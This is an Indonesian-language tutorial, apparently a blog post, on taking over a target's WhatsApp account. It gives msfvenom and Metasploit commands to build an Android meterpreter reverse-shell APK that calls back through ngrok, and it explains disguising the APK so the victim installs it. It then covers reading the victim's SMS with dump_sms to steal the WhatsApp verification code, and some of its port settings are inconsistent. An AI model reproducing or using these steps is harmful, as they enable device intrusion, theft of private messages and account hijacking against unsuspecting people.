Bahan-bahan nya yang kita perlukan adalah :
- termux yang sudah terinstall metasploit & ngrok,ngrok gunanya supaya lhost nya tidak berubah-ubah
- apk editor
- file manager
- apk kloningan wa atau download wa mod jga bisa untuk kita jadiin wa si target nya
- apk wifi kill atau apk lain ya apk nya kita buat sendiri aja untuk bohongin atau untuk mengelabuhi si target
Pertama-tama buka termux lalu kita buat dulu virus.apk nya dengan mengetik an :
( Session1 )
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16096 R > service.apk
Untuk mencari lport & lhost nya kita gunakan ngrok bisa juga sih kita pakai serveo tapi disini saya menggunakan ngrok buka ngrok di ( session 2 ) dengan mengetikan
(Session2)
$ ngrok tcp 1234/./ngrok http 8080
Kalau belum terconnect kalian hidupkan saja hotspot nya kemudian keluar lalu masuk lagi ke ngrok nya
Kalau sudah kita tunggu sampai selesai payload yang sudah kita buat tadi
Setelah itu kita buka session baru saja ketikan
Kita update & upgrade dulu
$ apt update && apt upgrade
$ ls
Kemudian kita izin kan untuk penyimpanan termux nya
$ termux-setup-storage
Kemudian kita pindahkan apk nya ke sdcard dengan mengetik an
$ mv (nama.apk) /sdcard
Terus kita cek lagi apakah apk nya sudah terpindahkan ketikan saja
$ ls
Oke setelah itu kita jalankan metasploit nya
$ msfconsole
Selagi membuka msfconsole nya kita edit dulu apk nya
Buka apk editor lalu kita pilih apk nya kemudian kita ubah (package name) ya contoh nya jadiin com.service.stage dan kita ubah nama apk nya jadiin (service root) nya biar si target gak curiga kemudian kita save
terus kita buka file manager cari apk yang kita buat dan save terus kita ubah nama nya jadi (service Root apk)
Setelah itu kita masuk ke termux dan metasploit nya
Kita setting dulu metasploit nya
msf5 > use multi/handler
msf5 > set payload android/meterpreter/reverse_tcp
Kita buka opstion dulu kita ubah lhost dan lport nya dengan mengetik an :
msf5 > show options
Kita liat lhost nya belum ada kan kita set kita bisa pakai dari ngrok tapi rekomendasi dari aku sih pakai lhost yang ini aja 0.0.0.0
msf5 > set LHOST 0.0.0.0
Sementara untuk lport nya untuk set yang disini tidak boleh sembarang kita ambil dari ngrok nya
msf5 > set LPORT 1234
Kita cek lagi apakah sudah ada
msf5 > show options
Jika sudah benar kita run
msf5 > run
Kemudian kita cari target dan cari lah cara agar si target menginstall apk yang kita sudah buat tadi kirim ke target apk nya suruh dia install yakin kan si target bahwa apk yang kita krim aman buat di install
Kalau sudah yakin si target menginstall apk nya kita salin no wa dia
Lalu kita pastekan di wa kloningan/wa mod yang sudah ada di hp kita
Kemudian kita suruh si target membuka apk nya dan cek di termux nya apakah sudah terhubung ke hp si target nya klo sudah terhubung
Maka tulisan msf5 nya akan menjadi (meterpreter) jika sudah terhubung ke hp korban
meterpreter >
kita daftarkan no wa si target di wa kloningan/mod yang sudah kita sediakan sebelum nya dan di saat itu wa nya akan meminta kode verifikasi dari no si target yang kita daftar kan dan kode tersebut akan terkirim ke hp si korban cara untuk mendapatkan kode tersebut adalah kita buka termux lalu ketikan di metasploit nya dump_sms
Pastikan metasploit nya sudah benar-benar terhubung ke hp si target kemudian ketikan :
meterpreter > dump_sms
Jika hasil nya sudah ada kita copy lalu kita buka session baru saja juga bisa
(Session3)
Ketikan saja
$ ls
Setelah Kita copy dump sms nya
Jika belum menginstall nano install dulu dengan mengetikan :
$ pkg install nano
Kemudian untuk melihat isi sms nya kita ketikan saja
$ nano ( pastekan dump_sms....txt disini yang kita copy tadi )
Kita bisa juga melihat sms nya menggunakan bantuan aplikasi lain
Dan perbesar lihat kode verifikasi nya dan setelah itu kita copy kode nya lalu kita keluar dari termux dan masuk kembali ke apk wa mod/apk wa kloningan tadi yang sudah kita daftarkan no si target lalu tinggal kita pastekan deh kode verifikasi wa nya
Tinggal kita ganti/biarkan saja nama wa nya
Dan lihat hasil nya apabila berhasil maka isi chat si target akan dapat kita lihat
mission succes...
Catatan :
- Gunakan lah dengan bijak dan dengan sebaik-baik nya
- jangan di salah gunakan
- kerusakan apapun yang kalian perbuat tidak menjadi tanggung jawab kami
Done.
0 komentar: